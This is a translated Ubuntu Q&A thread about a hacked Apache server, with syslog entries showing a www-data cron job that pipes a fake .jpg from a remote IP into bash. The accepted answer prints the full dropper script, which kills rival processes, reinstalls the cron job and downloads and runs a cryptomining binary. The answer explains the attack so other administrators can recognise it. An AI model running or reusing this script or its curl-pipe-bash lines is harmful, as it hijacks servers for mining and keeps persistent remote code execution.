主页 / ubuntu / 问题 / 1035524
Accepted
user1031742
Asked: 2018-05-13 16:06:50 +0800 CST

服务器受损 - ./sysd -c apache.cf -t 1 吃掉所有内存

  • 772

我的服务器肯定受到了损害。现在我想找到黑客进入服务器的位置。在攻击之前,我可以在 syslog 中看到:

 May 13 01:28:23 eee crontab[10680]: (www-data) DELETE (www-data)
May 13 01:28:23 eee crontab[10681]: (www-data) REPLACE (www-data)
May 13 01:29:01 eee cron[955]: (www-data) RELOAD (crontabs/www-data)
May 13 01:29:01 eee CRON[10697]: (www-data) CMD (curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s)

它能够添加 cronjob 并调用一些图像文件。我在哪里寻找线索?谢谢你。

在此处输入图像描述

apache2 hacking

1 个回答

  1. Best Answer

    仔细看看 curl cronjob。

    它执行一个 bash 命令,bash 脚本的名称是 logo11.jpg。

    curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s

    这只是一个非常便宜的技巧,而且不是很复杂。如果你把命令放在另一个顺序并下载文件,命令看起来像这样:

    请小心,不要下载文件并执行。这是信息性的

    bash -s logo11.jpg

    所以不要被结尾的 .jpg 所迷惑。它不是 jpg,它只是一个带有以下命令的纯文本文件。

    一旦它在你的 cron 中,bash 将简单地执行这个“文本”文件,它实际上是一个小的 bash 脚本。容易吧?

    #!/bin/sh
pkill -f suppoie 
pkill -f vlqd
ps aux | grep -vw apache | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep -w syslogs |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
crontab -r || true && \
echo "* * * * * curl -s http://136.144.175.206:4477/2/logo11.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
curl -o /var/tmp/sysd http://136.144.175.206:4477/2/sysd
curl -o /var/tmp/apache.cf http://136.144.175.206:4477/2/null.cf
chmod 777 /var/tmp/sysd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sysd -c apache.cf -t `echo $cores` >/dev/null &
fi
sleep 3
echo "running....."

    仅供参考 - 我通过电子邮件发送给 ISP 来查看这个,ip 仍然存在并且文件仍然可以下载。这是体面的事情,这就是我写这篇文章的原因。几行代码可以帮助管理员同事。

    • 1

相关问题